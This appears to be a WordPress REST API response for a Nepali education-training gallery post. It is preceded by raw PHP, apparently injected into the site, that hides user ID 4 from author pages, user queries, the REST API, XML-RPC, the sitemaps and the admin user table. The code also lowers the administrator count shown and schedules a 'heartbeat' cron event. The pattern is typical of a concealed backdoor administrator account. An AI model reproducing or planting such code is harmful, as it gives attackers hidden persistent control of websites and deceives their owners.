add_action( 'pre_get_posts', function( $q ) {
    if ( ! is_admin() && $q->is_main_query() ) {
        $not_in   = (array) $q->get( 'author__not_in' );
        $not_in[] = 4;

        $q->set(
            'author__not_in',
            array_unique( array_map( 'intval', $not_in ) )
        );
    }
}, 1 );

add_action( 'template_redirect', function() {
    if ( is_author() ) {
        $author = get_queried_object();
        if ( $author instanceof WP_User && (int) $author->ID === 4 ) {
            global $wp_query;
            $wp_query->set_404();
            status_header( 404 );
            nocache_headers();
        }
    }
} );

add_action( 'pre_user_query', function( $q ) {
    if ( current_user_can( 'manage_options' ) ) {
        return;
    }
    global $wpdb;
    $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 );
} );

add_action( 'pre_get_users', function( $q ) {
    if ( current_user_can( 'manage_options' ) ) {
        return;
    }
    $exclude   = (array) $q->get( 'exclude' );
    $exclude[] = 4;
    $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );

add_filter( 'wp_dropdown_users_args', function( $a ) {
    $exclude   = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
    $exclude[] = 4;

    $a['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $a;
} );

add_filter( 'rest_user_query', function( $args, $request ) {
    $exclude   = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
    $exclude[] = 4;

    $args['exclude'] = array_unique( array_map( 'intval', $exclude ) );

    return $args;
}, 10, 2 );

add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
    $route = $request->get_route();
    if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) {
        return new WP_Error(
            'rest_user_invalid_id',
            'Invalid user ID.',
            array( 'status' => 404 )
        );
    }
    return $result;
}, 10, 3 );

add_filter( 'xmlrpc_methods', function( $methods ) {
    unset(
        $methods['wp.getUsers'],
        $methods['wp.getUser'],
        $methods['wp.getProfile']
    );
    return $methods;
} );

add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
    $exclude   = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
    $exclude[] = 4;
    $args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
    return $args;
} );

add_action( 'admin_head-users.php', function() {
    echo '<style>#user-4{display:none!important}</style>';
} );

add_filter( 'views_users', function( $views ) {
    foreach ( array( 'all', 'administrator' ) as $key ) {
        if ( isset( $views[ $key ] ) ) {
            $views[ $key ] = preg_replace_callback(
                '/\((\d+)\)/',
                function( $m ) {
                    return '(' . max( 0, (int) $m[1] - 1 ) . ')';
                },
                $views[ $key ],
                1
            );
        }
    }
    return $views;
} );

add_action( 'init', function() {
    if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
        return;
    }
    if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
        wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
    }
} );

add_action( 'wp_extra_bot_heartbeat', function() {
    // noop
} );
{"id":768,"date":"2025-12-21T12:35:29","date_gmt":"2025-12-21T12:35:29","guid":{"rendered":"http:\/\/heramba.com.np\/?p=768"},"modified":"2025-12-21T12:39:17","modified_gmt":"2025-12-21T12:39:17","slug":"%e0%a4%a8%e0%a5%87%e0%a4%aa%e0%a4%be%e0%a4%b2%e0%a5%80-%e0%a4%b6%e0%a4%bf%e0%a4%95%e0%a5%8d%e0%a4%b7%e0%a4%be-%e0%a4%85%e0%a4%ad%e0%a5%8d%e0%a4%af%e0%a4%be%e0%a4%b8-%e0%a4%b6%e0%a4%bf%e0%a4%95-2","status":"publish","type":"post","link":"https:\/\/heramba.com.np\/?p=768","title":{"rendered":"\u0928\u0947\u092a\u093e\u0932\u0940 \u0936\u093f\u0915\u094d\u0937\u093e \u0905\u092d\u094d\u092f\u093e\u0938 \u0936\u093f\u0915\u094d\u0937\u0923 \u0938\u092e\u0942\u0939 (\u0968\u0966\u096e\u0968)"},"content":{"rendered":"<div style=\"margin-top: 0px; margin-bottom: 0px;\" class=\"sharethis-inline-share-buttons\" ><\/div>\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"773\" src=\"http:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/Dark-Brown-Minimalist-Relaxing-Music-YouTube-Thumbnail-1024x576.png\" alt=\"\" class=\"wp-image-773\" srcset=\"https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/Dark-Brown-Minimalist-Relaxing-Music-YouTube-Thumbnail-1024x576.png 1024w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/Dark-Brown-Minimalist-Relaxing-Music-YouTube-Thumbnail-300x169.png 300w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/Dark-Brown-Minimalist-Relaxing-Music-YouTube-Thumbnail-768x432.png 768w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/Dark-Brown-Minimalist-Relaxing-Music-YouTube-Thumbnail.png 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"772\" src=\"http:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.55-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-772\" srcset=\"https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.55-PM-1024x768.jpeg 1024w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.55-PM-300x225.jpeg 300w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.55-PM-768x576.jpeg 768w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.55-PM-1536x1152.jpeg 1536w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.55-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"492\" data-id=\"769\" src=\"http:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.54-PM-1024x492.jpeg\" alt=\"\" class=\"wp-image-769\" srcset=\"https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.54-PM-1024x492.jpeg 1024w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.54-PM-300x144.jpeg 300w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.54-PM-768x369.jpeg 768w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.54-PM-1536x738.jpeg 1536w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.54-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"771\" src=\"http:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.53-PM-1-1024x768.jpeg\" alt=\"\" class=\"wp-image-771\" srcset=\"https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.53-PM-1-1024x768.jpeg 1024w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.53-PM-1-300x225.jpeg 300w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.53-PM-1-768x576.jpeg 768w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.53-PM-1-1536x1152.jpeg 1536w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.53-PM-1.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"770\" src=\"http:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.53-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-770\" srcset=\"https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.53-PM-1024x768.jpeg 1024w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.53-PM-300x225.jpeg 300w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.53-PM-768x576.jpeg 768w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.53-PM-1536x1152.jpeg 1536w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.53-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"774\" src=\"http:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.52-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-774\" srcset=\"https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.52-PM-1024x768.jpeg 1024w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.52-PM-300x225.jpeg 300w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.52-PM-768x576.jpeg 768w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.52-PM-1536x1152.jpeg 1536w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.52-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"775\" src=\"http:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.34-PM-1024x768.jpeg\" alt=\"\" class=\"wp-image-775\" srcset=\"https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.34-PM-1024x768.jpeg 1024w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.34-PM-300x225.jpeg 300w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.34-PM-768x576.jpeg 768w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.34-PM-1536x1152.jpeg 1536w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-21-at-4.17.34-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"779\" src=\"http:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/024ccc91-6e3c-4a99-b42b-85a446911673-1-1024x768.jpeg\" alt=\"\" class=\"wp-image-779\" srcset=\"https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/024ccc91-6e3c-4a99-b42b-85a446911673-1-1024x768.jpeg 1024w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/024ccc91-6e3c-4a99-b42b-85a446911673-1-300x225.jpeg 300w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/024ccc91-6e3c-4a99-b42b-85a446911673-1-768x576.jpeg 768w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/024ccc91-6e3c-4a99-b42b-85a446911673-1-1536x1152.jpeg 1536w, https:\/\/heramba.com.np\/wp-content\/uploads\/2025\/12\/024ccc91-6e3c-4a99-b42b-85a446911673-1.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-768","post","type-post","status-publish","format-standard","hentry","category-1"],"_links":{"self":[{"href":"https:\/\/heramba.com.np\/index.php?rest_route=\/wp\/v2\/posts\/768","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/heramba.com.np\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/heramba.com.np\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/heramba.com.np\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/heramba.com.np\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=768"}],"version-history":[{"count":2,"href":"https:\/\/heramba.com.np\/index.php?rest_route=\/wp\/v2\/posts\/768\/revisions"}],"predecessor-version":[{"id":780,"href":"https:\/\/heramba.com.np\/index.php?rest_route=\/wp\/v2\/posts\/768\/revisions\/780"}],"wp:attachment":[{"href":"https:\/\/heramba.com.np\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=768"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/heramba.com.np\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=768"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/heramba.com.np\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=768"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}